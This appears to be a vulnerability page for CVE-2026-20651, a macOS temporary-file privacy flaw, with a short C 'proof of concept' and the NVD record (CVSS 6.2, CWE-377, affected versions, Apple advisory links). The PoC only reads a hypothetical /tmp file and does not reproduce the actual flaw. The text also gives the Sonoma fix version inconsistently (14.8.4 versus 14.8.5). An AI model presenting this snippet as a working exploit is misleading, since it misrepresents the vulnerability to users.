CVE-2026-20651

#include <stdio.h> #include <stdlib.h> // Proof of Concept (PoC) for CVE-2026-20651 // This simulates an attempt to access sensitive temporary files. // Compile: gcc poc.c -o poc int main() { printf("[*] Attempting to access sensitive temporary files...\n"); // Hypothetical path to a sensitive temp file vulnerable to the issue char* vulnerable_file = "/tmp/sensitive_app_data.tmp"; FILE* fp = fopen(vulnerable_file, "r"); if (fp != NULL) { printf("[+] SUCCESS: File %s is readable! Data leaked:\n", vulnerable_file); char buffer[256]; while (fgets(buffer, sizeof(buffer), fp)) { printf("%s", buffer); } fclose(fp); } else { printf("[-] Failed to read file. System may be patched or file does not exist.\n"); } return 0; }

{"cve": {"id": "CVE-2026-20651", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:04.743", "lastModified": "2026-03-25T21:32:39.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Tahoe 26.3. An app may be able to access sensitive user data."}, {"lang": "es", "value": "Un problema de privacidad fue abordado con un manejo mejorado de los archivos temporales. Este problema está solucionado en macOS Sequoia 15.7.5, macOS Sonoma 14.8.4, macOS Tahoe 26.3. Una aplicación podría acceder a datos sensibles del usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.5", "matchCriteriaId": "D66288AF-23BD-407A-81F5-F1DFBF84C622"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.5", "matchCriteriaId": "DD21D2C9-BBEC-4E8E-B8D2-C92B7E6155E1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.3", "matchCriteriaId": "0488A377-7971-4703-8823-05BF1E23CF48"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126348", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126350", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126795", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}